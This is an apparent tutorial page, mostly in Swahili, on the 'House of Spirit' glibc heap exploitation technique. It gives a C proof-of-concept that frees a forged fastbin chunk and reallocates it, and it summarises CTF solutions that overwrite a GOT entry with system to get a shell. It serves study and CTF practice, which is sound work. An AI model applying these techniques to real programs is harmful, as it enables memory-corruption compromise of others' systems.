House of Spirit

Reading time: 4 minutes

Basic Information

Code

#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
size_t prev_size;
size_t size;
struct fast_chunk *fd;
struct fast_chunk *bk;
char buf[0x20];               // chunk falls in fastbin size range
};

int main() {
struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
void *ptr, *victim;

ptr = malloc(0x30);

printf("Original alloc address: %p\n", ptr);
printf("Main fake chunk:%p\n", &fake_chunks[0]);
printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

// Passes size check of "free(): invalid size"
fake_chunks[0].size = sizeof(struct fast_chunk);

// Passes "free(): invalid next size (fast)"
fake_chunks[1].size = sizeof(struct fast_chunk);

// Attacker overwrites a pointer that is about to be 'freed'
// Point to .fd as it's the start of the content of the chunk
ptr = (void *)&fake_chunks[0].fd;

free(ptr);

victim = malloc(0x30);
printf("Victim: %p\n", victim);

return 0;
}

Lengo

• Kuwa na uwezo wa kuongeza kwenye tcache / fast bin an address ili baadaye iwezekane kuipatia

Mahitaji

• Shambulio hili linahitaji mshambuliaji kuwa na uwezo wa kuunda vipande viwili vya uwongo vya haraka vinavyoonyesha kwa usahihi thamani ya ukubwa wake na kisha kuwa na uwezo wa kuachilia kipande cha kwanza cha uwongo ili kiingie kwenye bin.

Shambulio

• Unda vipande vya uwongo vinavyopitisha ukaguzi wa usalama: utahitaji vipande 2 vya uwongo kwa msingi vinavyoonyesha katika nafasi sahihi ukubwa sahihi
• Kwa namna fulani, jaribu kuachilia kipande cha kwanza cha uwongo ili kiingie kwenye fast au tcache bin na kisha kiweze kupewa ili kuandika anwani hiyo

Msimbo kutoka guyinatuxedo ni mzuri kuelewa shambulio hilo. Ingawa mpango huu kutoka kwa msimbo unaufupisha vizuri:

/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/

Mifano

• CTF https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html

• Libc infoleak: Kupitia overflow inawezekana kubadilisha pointer ili kuelekeza kwenye anwani ya GOT ili kuvuja anwani ya libc kupitia kitendo cha kusoma cha CTF

• House of Spirit: Kutumia counter inayohesabu idadi ya "rifles" inawezekana kuzalisha saizi bandia ya kipande cha kwanza bandia, kisha kutumia "message" inawezekana kuficha saizi ya pili ya kipande na hatimaye kutumia overflow inawezekana kubadilisha pointer ambayo itakombolewa ili kipande chetu cha kwanza bandia kikombolewe. Kisha, tunaweza kukitenga na ndani yake kutakuwa na anwani ya mahali ambapo "message" imehifadhiwa. Kisha, inawezekana kufanya hii kuelekeze kwenye kiingilio cha scanf ndani ya jedwali la GOT, ili tuweze kuandika tena na anwani ya system.
  Wakati scanf inaitwa tena, tunaweza kutuma ingizo "/bin/sh" na kupata shell.

• Gloater. HTB Cyber Apocalypse CTF 2024

• Glibc leak: Buffer ya stack isiyoanzishwa.

• House of Spirit: Tunaweza kubadilisha index ya kwanza ya array ya kimataifa ya pointers za heap. Kwa mabadiliko ya byte moja, tunatumia free kwenye kipande bandia ndani ya kipande halali, ili tupate hali ya vipande vinavyovuka baada ya kutenga tena. Kwa hiyo, shambulio rahisi la Tcache poisoning linafanya kazi kupata primitive ya kuandika isiyo na mpangilio.

Marejeleo

• https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit